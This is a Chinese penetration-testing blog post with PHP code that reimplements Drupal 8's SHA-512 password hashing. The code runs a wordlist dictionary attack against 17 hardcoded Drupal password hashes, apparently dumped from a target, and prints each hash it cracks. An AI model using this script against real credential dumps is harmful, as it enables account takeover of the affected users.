[渗透测试]drupal 8 密文生成程序

Posted by
drupal 8
密文加密方式:
代码路径
core\lib\Drupal\Core\Password\PhpassHashedPassword.php
  public function hash($password) {
    return $this->crypt('sha512', $password, $this->generateSalt());
  }
drupal 8密文生成
<?php
function base64Encode($input, $count) {
    $ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
    $output = '';
    $i = 0;
    do {
        $value = ord($input[$i++]);
        $output .= $ITOA64[$value & 0x3f];
        if ($i < $count) {
            $value |= ord($input[$i]) << 8;
        }
        $output .= $ITOA64[($value >> 6) & 0x3f];
        if ($i++ >= $count) {
            break;
        }
        if ($i < $count) {
            $value |= ord($input[$i]) << 16;
        }
        $output .= $ITOA64[($value >> 12) & 0x3f];
        if ($i++ >= $count) {
            break;
        }
        $output .= $ITOA64[($value >> 18) & 0x3f];
    } while ($i < $count);

    return $output;
}

# $setting 密文的前12位
function create_password($algo = 'sha512', $password, $setting) {

    // The first 12 characters of an existing hash are its setting string.
    $setting = substr($setting, 0, 12);

    if ($setting[0] != '$' || $setting[2] != '$') {
        return FALSE;
    }
    #$count_log2 = $this->getCountLog2($setting);
    $count_log2 = 16;
    // Stored hashes may have been crypted with any iteration count. However we
    // do not allow applying the algorithm for unreasonable low and high values
    // respectively.
//    if ($count_log2 != $this->enforceLog2Boundaries($count_log2)) {
//        return FALSE;
//    }
    $salt = substr($setting, 4, 8);
    // Hashes must have an 8 character salt.
    if (strlen($salt) != 8) {
        return FALSE;
    }

    // Convert the base 2 logarithm into an integer.
    $count = 1 << $count_log2;

    // We rely on the hash() function being available in PHP 5.2+.
    $hash = hash($algo, $salt . $password, TRUE);
    do {
        $hash = hash($algo, $hash . $password, TRUE);
    } while (--$count);

    $len = strlen($hash);
    $output = $setting . base64Encode($hash, $len);
    // $this->base64Encode() of a 16 byte MD5 will always be 22 characters.
    // $this->base64Encode() of a 64 byte sha512 will always be 86 characters.
    $expected = 12 + ceil((8 * $len) / 6);
    return (strlen($output) == $expected) ? substr($output, 0, 55) : FALSE;
}

$password_list = [
    '$S$EDng5s3foLnWX.w6TeyoO8Iy7Jff48RISfBYLLUrcLciJIQigvMw',
    '$S$EFL5LnK1hHwCVDPZzRRsN94IZOQ3zQqHDlcg5x5vER2hBNRpCbyI',
    '$S$EWeXllwfyLOEyziRHFXzGp74Yv.Bf/jkMw101oLYbn/gqsjgWYbh',
    '$S$Ew6vCgMXz67/h6I0.H2cHoHHOphtI1g.MWgmFqJWqIVdgVWuYcFG',
    '$S$Eu06Hccs3GV5RHyz0EtM6JPqSIwe06a7TpKvBLYeJUoR2/1GNxDo',
    '$S$EcDtaITazCmRIWPov2UTfq/e0STcNvDrOmsCA5ERmA5gfoPeos9d',
    '$S$E0hmLiDDF9K04PSQzeTBLvA1fAu9fZFudmLJ/6eFVjTqf54b/2UR',
    '$S$Ens.rCl3HlyYqziPOU7s4xY3mqXFQcHRuswiGyDP.8.275AfHoBr',
    '$S$ECAWz9bUJfexs8riyUnEdP9jUzzypP024PQdFdvsl6pcNCWHpEG.',
    '$S$EwYsYexPwgQGfmlZpodts0scQnleH/h4yZBXIDYaU6CYMmbEtEL9',
    '$S$EWVl5hcElUqUlgHe3n7.AoyV39cNc9SvNWaW707eJbvbsZUHGw/r',
    '$S$E30.hGWDbSZtZJmLGizOX956Q6etROK5ERbvjHEcrxFwr8a5elvw',
    '$S$E./mFPKqMrUH4bOQIfOa.MUgyFC9QaPmwL6T4shzMDPo1zcKsBAY',
    '$S$EW2wK272BLtpbrAmdWPXvT5.OvvFz34FmKycVy3hdyaOD9Bwxpjx',
    '$S$Eeo7A1RcfX1FWrcNQjc.4xAipQIgvpdx3ypaEDQfTVfFedxlMklw',
    '$S$E/jEXIzyzk7/eAO2rZje0LU1Jh5/bkbEpo7t/xLIlhGENITe9KjN',
    '$S$ENYSSevuZ/ISj89y0/QCrm.nQ8dqQxIpZoTjLUhyKGoo2rs43xbQ'
];
$weak_password = [];

$password_file = fopen('password.txt','r');
while(!feof($password_file)){
    $weak_password[] = trim(fgets($password_file));
}
fclose($password_file);
foreach ($password_list as $password){
    $setting = substr($password, 0, 12);
    foreach ($weak_password as $weak){
        $temp_password = create_password('sha512', $weak, $setting);
        if($temp_password == $password){
            echo $password;
            echo $weak;
        }
    }
    #echo $setting;
    #exit();
}

Leave a Reply

电子邮件地址不会被公开。 必填项已用*标注